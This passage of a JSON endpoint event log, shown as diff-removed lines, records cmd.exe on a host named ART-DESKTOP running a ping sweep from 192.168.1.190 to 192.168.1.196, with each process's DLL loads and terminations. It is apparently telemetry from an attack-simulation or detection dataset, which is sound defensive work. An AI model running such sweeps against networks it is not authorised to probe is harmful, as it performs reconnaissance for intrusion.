3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572912140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "event_type": "process", - "pid": 3136, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572916990000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-0010DA645301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.190", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 260, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572917130000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917140000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917300000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917300000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572917300000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "event_type": "process", - "pid": 260, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572921830000, - "unique_pid": "{42FC7E13-CBAB-5C05-0000-001073675301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.191", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6508, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572921980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "event_type": "process", - "pid": 6508, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572926840000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010EB695301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.192", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4204, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572926980000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "event_type": "process", - "pid": 4204, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572931830000, - "unique_pid": "{42FC7E13-CBAC-5C05-0000-0010676C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.193", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5084, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572931980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "event_type": "process", - "pid": 5084, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572936830000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-0010D76E5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.194", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3940, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572936980000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "event_type": "process", - "pid": 3940, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572941840000, - "unique_pid": "{42FC7E13-CBAD-5C05-0000-001057715301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.195", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3592, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572941980000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "event_type": "process", - "pid": 3592, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572946990000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-0010D9735301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.196", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572947130000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": 